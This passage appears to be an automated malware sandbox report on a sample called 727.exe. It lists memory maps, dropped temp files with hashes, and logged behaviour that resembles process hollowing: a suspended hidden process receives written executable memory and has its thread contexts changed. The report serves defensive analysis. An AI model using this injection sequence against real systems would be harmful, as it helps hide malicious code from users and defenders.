| private_0x0000000000140000 | 0x00140000 | 0x00140fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000150000 | 0x00150000 | 0x00150fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000160000 | 0x00160000 | 0x00174fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000180000 | 0x00180000 | 0x00195fff | Private Memory | rwx |
|
|
|
- |
| private_0x00000000001a0000 | 0x001a0000 | 0x0029ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x002a0000 | 0x00306fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000310000 | 0x00310000 | 0x003d7fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000003e0000 | 0x003e0000 | 0x003f5fff | Private Memory | rw |
|
|
|
- |
| 727.exe | 0x00400000 | 0x00426fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000430000 | 0x00430000 | 0x00530fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000540000 | 0x00540000 | 0x0054ffff | Private Memory | rwx |
|
|
|
- |
| pagefile_0x0000000000550000 | 0x00550000 | 0x00550fff | Pagefile Backed Memory | rw |
|
|
|
- |
| rsaenh.dll | 0x00560000 | 0x0059bfff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000560000 | 0x00560000 | 0x00561fff | Pagefile Backed Memory | r |
|
|
|
- |
| windowsshell.manifest | 0x00570000 | 0x00570fff | Memory Mapped File | r |
|
|
|
- |
| index.dat | 0x00570000 | 0x0057ffff | Memory Mapped File | rw |
|
|
|
- |
| pagefile_0x0000000000580000 | 0x00580000 | 0x00581fff | Pagefile Backed Memory | r |
|
|
|
- |
| index.dat | 0x00590000 | 0x00597fff | Memory Mapped File | rw |
|
|
|
- |
| private_0x00000000005a0000 | 0x005a0000 | 0x005affff | Private Memory | rw |
|
|
|
- |
| index.dat | 0x005b0000 | 0x005bffff | Memory Mapped File | rw |
|
|
|
- |
| private_0x00000000005c0000 | 0x005c0000 | 0x005c0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000005c0000 | 0x005c0000 | 0x005c0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000005d0000 | 0x005d0000 | 0x005dffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000005e0000 | 0x005e0000 | 0x011dffff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x011e0000 | 0x014aefff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000014b0000 | 0x014b0000 | 0x0158efff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001590000 | 0x01590000 | 0x01590fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000015a0000 | 0x015a0000 | 0x015dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000015e0000 | 0x015e0000 | 0x016dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000016e0000 | 0x016e0000 | 0x0188ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000016e0000 | 0x016e0000 | 0x0181ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000016e0000 | 0x016e0000 | 0x017dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000016e0000 | 0x016e0000 | 0x016effff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000016e0000 | 0x016e0000 | 0x016e6fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000016e0000 | 0x016e0000 | 0x01776fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000016e0000 | 0x016e0000 | 0x01703fff | Private Memory | rwx |
|
|
|
- |
| pagefile_0x00000000016f0000 | 0x016f0000 | 0x016f6fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000001710000 | 0x01710000 | 0x01746fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000001750000 | 0x01750000 | 0x0178afff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000001790000 | 0x01790000 | 0x01795fff | Private Memory | rwx |
|
|
|
- |
| private_0x00000000017a0000 | 0x017a0000 | 0x017bbfff | Private Memory | rwx |
|
|
|
- |
| f833.tmp | 0x017a0000 | 0x017a0fff | Memory Mapped File | r |
|
|
|
|
| private_0x00000000017c0000 | 0x017c0000 | 0x017d8fff | Private Memory | rwx |
|
|
|
- |
| private_0x00000000017e0000 | 0x017e0000 | 0x0181ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001820000 | 0x01820000 | 0x01820fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001830000 | 0x01830000 | 0x01831fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000001850000 | 0x01850000 | 0x0188ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001890000 | 0x01890000 | 0x0198ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001990000 | 0x01990000 | 0x01a8ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001a90000 | 0x01a90000 | 0x01b8ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001b90000 | 0x01b90000 | 0x01beffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001bf0000 | 0x01bf0000 | 0x01dbffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001bf0000 | 0x01bf0000 | 0x01d3ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001bf0000 | 0x01bf0000 | 0x01ceffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001cf0000 | 0x01cf0000 | 0x01d86fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001cf0000 | 0x01cf0000 | 0x01d51fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000001db0000 | 0x01db0000 | 0x01dbffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001dc0000 | 0x01dc0000 | 0x01e1afff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000001e60000 | 0x01e60000 | 0x01e9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001ea0000 | 0x01ea0000 | 0x01f9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001fa0000 | 0x01fa0000 | 0x0209ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000020a0000 | 0x020a0000 | 0x0218dfff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002190000 | 0x02190000 | 0x0228ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002290000 | 0x02290000 | 0x0238ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002390000 | 0x02390000 | 0x0248ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002490000 | 0x02490000 | 0x0258ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002590000 | 0x02590000 | 0x0268ffff | Private Memory | rw |
|
|
|
- |
| winscard.dll | 0x5fc00000 | 0x5fc22fff | Memory Mapped File | rwx |
|
|
|
- |
| npmproxy.dll | 0x6f010000 | 0x6f017fff | Memory Mapped File | rwx |
|
|
|
- |
| rasadhlp.dll | 0x6f260000 | 0x6f265fff | Memory Mapped File | rwx |
|
|
|
- |
| netprofm.dll | 0x6f280000 | 0x6f2d9fff | Memory Mapped File | rwx |
|
|
|
- |
| dhcpcsvc.dll | 0x72720000 | 0x72731fff | Memory Mapped File | rwx |
|
|
|
- |
| dhcpcsvc6.dll | 0x72740000 | 0x7274cfff | Memory Mapped File | rwx |
|
|
|
- |
| mpr.dll | 0x72750000 | 0x72761fff | Memory Mapped File | rwx |
|
|
|
- |
| winnsi.dll | 0x72810000 | 0x72816fff | Memory Mapped File | rwx |
|
|
|
- |
| iphlpapi.dll | 0x72820000 | 0x7283bfff | Memory Mapped File | rwx |
|
|
|
- |
| fwpuclnt.dll | 0x72860000 | 0x72897fff | Memory Mapped File | rwx |
|
|
|
- |
| winrnr.dll | 0x72bc0000 | 0x72bc7fff | Memory Mapped File | rwx |
|
|
|
- |
| pnrpnsp.dll | 0x72bd0000 | 0x72be1fff | Memory Mapped File | rwx |
|
|
|
- |
| napinsp.dll | 0x72bf0000 | 0x72bfffff | Memory Mapped File | rwx |
|
|
|
- |
| rasman.dll | 0x731f0000 | 0x73204fff | Memory Mapped File | rwx |
|
|
|
- |
| rasapi32.dll | 0x73210000 | 0x73261fff | Memory Mapped File | rwx |
|
|
|
- |
| winspool.drv | 0x738c0000 | 0x73910fff | Memory Mapped File | rwx |
|
|
|
- |
| nlaapi.dll | 0x73dd0000 | 0x73ddffff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x740e0000 | 0x74100fff | Memory Mapped File | rwx |
|
|
|
- |
| rtutils.dll | 0x74110000 | 0x7411cfff | Memory Mapped File | rwx |
|
|
|
- |
| sensapi.dll | 0x74120000 | 0x74125fff | Memory Mapped File | rwx |
|
|
|
- |
| netapi32.dll | 0x74270000 | 0x74280fff | Memory Mapped File | rwx |
|
|
|
- |
| wtsapi32.dll | 0x74370000 | 0x7437cfff | Memory Mapped File | rwx |
|
|
|
- |
| dwmapi.dll | 0x744c0000 | 0x744d2fff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x747f0000 | 0x7482ffff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74970000 | 0x74b0dfff | Memory Mapped File | rwx |
|
|
|
- |
| wshtcpip.dll | 0x74f70000 | 0x74f74fff | Memory Mapped File | rwx |
|
|
|
- |
| userenv.dll | 0x75040000 | 0x75056fff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x75200000 | 0x7523afff | Memory Mapped File | rwx |
|
|
|
- |
| dnsapi.dll | 0x752e0000 | 0x75323fff | Memory Mapped File | rwx |
|
|
|
- |
| wship6.dll | 0x75410000 | 0x75415fff | Memory Mapped File | rwx |
|
|
|
- |
| mswsock.dll | 0x75420000 | 0x7545bfff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x75460000 | 0x75475fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x758c0000 | 0x758dafff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x758e0000 | 0x758ebfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrtremote.dll | 0x75980000 | 0x7598dfff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x75990000 | 0x7599afff | Memory Mapped File | rwx |
|
|
|
- |
| msasn1.dll | 0x75a00000 | 0x75a0bfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75a10000 | 0x75a59fff | Memory Mapped File | rwx |
|
|
|
- |
| crypt32.dll | 0x75a90000 | 0x75bacfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x75c90000 | 0x75d2ffff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x75d30000 | 0x75dfbfff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x75e00000 | 0x75e82fff | Memory Mapped File | rwx |
|
|
|
- |
| urlmon.dll | 0x75e90000 | 0x75fc5fff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x75fd0000 | 0x75fe8fff | Memory Mapped File | rwx |
|
|
|
- |
| wldap32.dll | 0x75ff0000 | 0x76034fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76040000 | 0x760ebfff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x760f0000 | 0x76d39fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x76d40000 | 0x76d8dfff | Memory Mapped File | rwx |
|
|
|
- |
| nsi.dll | 0x76f60000 | 0x76f65fff | Memory Mapped File | rwx |
|
|
|
- |
| iertutil.dll | 0x76f70000 | 0x7716afff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77170000 | 0x77238fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x77240000 | 0x772dcfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x77360000 | 0x773eefff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x773f0000 | 0x77490fff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x774a0000 | 0x774f6fff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x77500000 | 0x7765bfff | Memory Mapped File | rwx |
|
|
|
- |
| wininet.dll | 0x77660000 | 0x77754fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x77760000 | 0x77833fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77840000 | 0x7797bfff | Memory Mapped File | rwx |
|
|
|
- |
| normaliz.dll | 0x77990000 | 0x77992fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x779a0000 | 0x779befff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x77a20000 | 0x77a29fff | Memory Mapped File | rwx |
|
|
|
- |
| ws2_32.dll | 0x77a30000 | 0x77a64fff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x77a80000 | 0x77a80fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd3000 | 0x7ffd3000 | 0x7ffd3fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffd4000 | 0x7ffd4000 | 0x7ffd4fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffd5000 | 0x7ffd5000 | 0x7ffd5fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffd6000 | 0x7ffd6000 | 0x7ffd6fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffd7000 | 0x7ffd7000 | 0x7ffd7fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffd8fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffd9000 | 0x7ffd9000 | 0x7ffd9fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffda000 | 0x7ffda000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffdbfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdc000 | 0x7ffdc000 | 0x7ffdcfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdd000 | 0x7ffdd000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
|
For performance reasons, the remaining 16 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Created Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| C:\Users\BGC6U8~1\AppData\Local\Temp\F843.tmp | 0.05 KB |
MD5:
61974b8f808747119a0234c563fda669
SHA1: 16bdeca2a2f85bc92c608d84ba8f892b692b2172 SHA256: f188d8900c336dc2745411755c8b90588a2c3d24a99afee9f9e13b8ddd3f53ea SSDeep: 3:PlQVlAVUKbnwRl+RJZ3E:dQPAbwDn |
|
|
| C:\Users\BGC6U8~1\AppData\Local\Temp\F833.tmp | 0.08 KB |
MD5:
172ee94da6ee51655ec4ff88bee8c5eb
SHA1: 6c8a98026cb9e733aa1b32f8516d268e831d13b9 SHA256: 28886aa73bb5eccdf20c58ade6ba559a89733369743301b30cbb33b9321ca1f7 SSDeep: 3:Rq3sFZJiKbNLQDW7q1KcKJRKVJmz:43sPJ38DjKNRo4 |
|
|
Host Behavior
File (18)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\BGC6U8~1\AppData\Local\Temp\F843.tmp | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\BGC6U8~1\AppData\Local\Temp\F854.tmp | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\BGC6U8~1\AppData\Local\Temp\F833.tmp | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create Temp File | C:\Users\BGC6U8~1\AppData\Local\Temp\F833.tmp | path = C:\Users\BGC6U8~1\AppData\Local\Temp\ |
|
1 | |
| Create Temp File | C:\Users\BGC6U8~1\AppData\Local\Temp\F843.tmp | path = C:\Users\BGC6U8~1\AppData\Local\Temp\ |
|
1 | |
| Create Temp File | C:\Users\BGC6U8~1\AppData\Local\Temp\F854.tmp | path = C:\Users\BGC6U8~1\AppData\Local\Temp\ |
|
1 | |
| Get Info | C:\Users\BGC6U8~1\AppData\Local\Temp\F843.tmp | type = size |
|
1 | |
| Get Info | C:\Users\BGC6U8~1\AppData\Local\Temp\F854.tmp | type = size |
|
1 | |
| Get Info | C:\Users\BGC6U8~1\AppData\Local\Temp\F833.tmp | type = size |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Delete | C:\Users\BGC6U8~1\AppData\Local\Temp\F833.tmp | - |
|
2 | |
| Delete | C:\Users\BGC6U8~1\AppData\Local\Temp\F843.tmp | - |
|
2 | |
| Delete | C:\Users\BGC6U8~1\AppData\Local\Temp\F854.tmp | - |
|
2 |
Process (6)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.exe" /scomma "C:\Users\BGC6U8~1\AppData\Local\Temp\F833.tmp" | os_pid = 0xd40, creation_flags = CREATE_SUSPENDED, CREATE_UNICODE_ENVIRONMENT, show_window = SW_HIDE |
|
1 | |
| Create | "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.exe" "C:\Users\BGC6U8~1\AppData\Local\Temp\F843.tmp" | os_pid = 0xd48, creation_flags = CREATE_SUSPENDED, CREATE_UNICODE_ENVIRONMENT, show_window = SW_HIDE |
|
1 | |
| Create | "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.exe" /scomma "C:\Users\BGC6U8~1\AppData\Local\Temp\F854.tmp" | os_pid = 0xd50, creation_flags = CREATE_SUSPENDED, CREATE_UNICODE_ENVIRONMENT, show_window = SW_HIDE |
|
1 | |
| Terminate | "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.exe" "C:\Users\BGC6U8~1\AppData\Local\Temp\F843.tmp" | exit_code = 0 |
|
1 | |
| Terminate | "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.exe" /scomma "C:\Users\BGC6U8~1\AppData\Local\Temp\F854.tmp" | exit_code = 0 |
|
1 | |
| Terminate | "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.exe" /scomma "C:\Users\BGC6U8~1\AppData\Local\Temp\F833.tmp" | exit_code = 0 |
|
1 |
Thread (9)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Context | c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\aeroroyale.exe | os_tid = 0xd2c |
|
1 | |
| Get Context | c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\aeroroyale.exe | os_tid = 0xd34 |
|
1 | |
| Get Context | c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\aeroroyale.exe | os_tid = 0xd38 |
|
1 | |
| Set Context | c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\aeroroyale.exe | os_tid = 0xd2c |
|
1 | |
| Set Context | c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\aeroroyale.exe | os_tid = 0xd34 |
|
1 | |
| Set Context | c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\aeroroyale.exe | os_tid = 0xd38 |
|
1 | |
| Resume | c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\aeroroyale.exe | os_tid = 0xd2c |
|
1 | |
| Resume | c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\aeroroyale.exe | os_tid = 0xd34 |
|
1 | |
| Resume | c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\aeroroyale.exe | os_tid = 0xd38 |
|
1 |
Memory (13)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Allocate | "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.exe" /scomma "C:\Users\BGC6U8~1\AppData\Local\Temp\F854.tmp" | address = 0x400000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 372736 |
|
1 | |
| Get Info | "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.exe" /scomma "C:\Users\BGC6U8~1\AppData\Local\Temp\F833.tmp" | address = 0x400000, allocation_type = MEM_RESET_UNDO, protection_out = PAGE_READONLY, size_out = 4096 |
|
1 | |
| Get Info | "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.exe" "C:\Users\BGC6U8~1\AppData\Local\Temp\F843.tmp" | address = 0x400000, allocation_type = MEM_RESET_UNDO, protection_out = PAGE_READONLY, size_out = 4096 |
|
1 | |
| Get Info | "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.exe" /scomma "C:\Users\BGC6U8~1\AppData\Local\Temp\F854.tmp" | address = 0x400000, allocation_type = MEM_RESET_UNDO, protection_out = PAGE_READONLY, size_out = 4096 |
|
1 | |
| Protect | "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.exe" /scomma "C:\Users\BGC6U8~1\AppData\Local\Temp\F833.tmp" | address = 0x400000, protection = PAGE_EXECUTE_READWRITE, size = 114688 |
|
1 | |
| Protect | "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.exe" "C:\Users\BGC6U8~1\AppData\Local\Temp\F843.tmp" | address = 0x400000, protection = PAGE_EXECUTE_READWRITE, size = 102400 |
|
1 | |
| Protect | "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.exe" /scomma "C:\Users\BGC6U8~1\AppData\Local\Temp\F854.tmp" | address = 0x400000, protection = PAGE_EXECUTE_READWRITE, size = 372736 |
|
1 | |
| Write | "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.exe" /scomma "C:\Users\BGC6U8~1\AppData\Local\Temp\F833.tmp" | address = 0x400000, size = 114688 |
|
1 | |
| Write | "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.exe" /scomma "C:\Users\BGC6U8~1\AppData\Local\Temp\F833.tmp" | address = 0x7ffdf008, size = 4 |
|
1 | |
| Write | "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.exe" "C:\Users\BGC6U8~1\AppData\Local\Temp\F843.tmp" | address = 0x400000, size = 102400 |
|
1 | |
| Write | "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.exe" "C:\Users\BGC6U8~1\AppData\Local\Temp\F843.tmp" | address = 0x7ffdc008, size = 4 |
|
1 | |
| Write | "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.exe" /scomma "C:\Users\BGC6U8~1\AppData\Local\Temp\F854.tmp" | address = 0x400000, size = 372736 |
|
1 | |
| Write | "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.exe" /scomma "C:\Users\BGC6U8~1\AppData\Local\Temp\F854.tmp" | address = 0x7ffda008, size = 4 |
|
1 |
Module (94)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | USER32.dll | base_address = 0x77170000 |
|
1 | |
| Load | KERNEL32.dll | base_address = 0x77760000 |
|
1 | |
| Load | crypt32.dll | base_address = 0x75a90000 |
|
6 | |
| Load | urlmon.dll | base_address = 0x75e90000 |
|
5 | |
| Load | user32.dll | base_address = 0x77170000 |
|
1 | |
| Load | advapi32.dll | base_address = 0x75c90000 |
|
5 | |
| Load | shell32.dll | base_address = 0x760f0000 |
|
5 | |
| Load | userenv.dll | base_address = 0x75040000 |
|
3 | |
| Load | wininet.dll | base_address = 0x77660000 |
|
4 | |
| Load | wtsapi32.dll | base_address = 0x74370000 |
|
4 | |
| Load | ws2_32.dll | base_address = 0x77a30000 |
|
1 | |
| Load | mpr.dll | base_address = 0x72750000 |
|
1 | |
| Load | netapi32.dll | base_address = 0x74270000 |
|
1 | |
| Load | SAMCLI.DLL | base_address = 0x74240000 |
|
1 | |
| Get Handle | c:\users\bgc6u8~1\appdata\local\temp\727.exe | base_address = 0x400000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x77760000 |
|
1 | |
| Get Filename | - | process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\aeroroyale.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.exe, size = 260 |
|
4 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x12fcd0 |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x12fcf0 |
|
1 | |
| Get Address | - | function = LoadLibraryA, ordinal = 0, address_out = 0x12fd68 |
|
1 | |
| Get Address | - | function = GetProcAddress, ordinal = 0, address_out = 0x12fd68 |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x12fd68 |
|
1 | |
| Get Address | - | function = VirtualProtect, ordinal = 0, address_out = 0x12fd68 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfA, address_out = 0x77183f47 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetLastError, address_out = 0x777abb08 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FreeConsole, address_out = 0x7780bfde |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = lstrlenW, address_out = 0x777ad9e8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = lstrcmpA, address_out = 0x77798c59 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLastError, address_out = 0x777abf00 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetCurrentProcess, address_out = 0x777acdcf |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetCurrentProcessId, address_out = 0x777acac4 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsAlloc, address_out = 0x777b418d |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsFree, address_out = 0x777b1f61 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsGetValue, address_out = 0x777b1e16 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsSetValue, address_out = 0x777b76e6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x777b3879 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateEventExW, address_out = 0x777624d8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x77792111 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x777a2510 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x7779b009 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x778689be |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x7785c02a |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x7785c0d2 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x77793f78 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadpoolWait, address_out = 0x77868bfb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x7785b567 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x77885998 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x77852251 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x778528f6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x77792004 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x777e9aa9 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x777ef3cf |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CompareStringEx, address_out = 0x777bebc6 |
|
1 | |
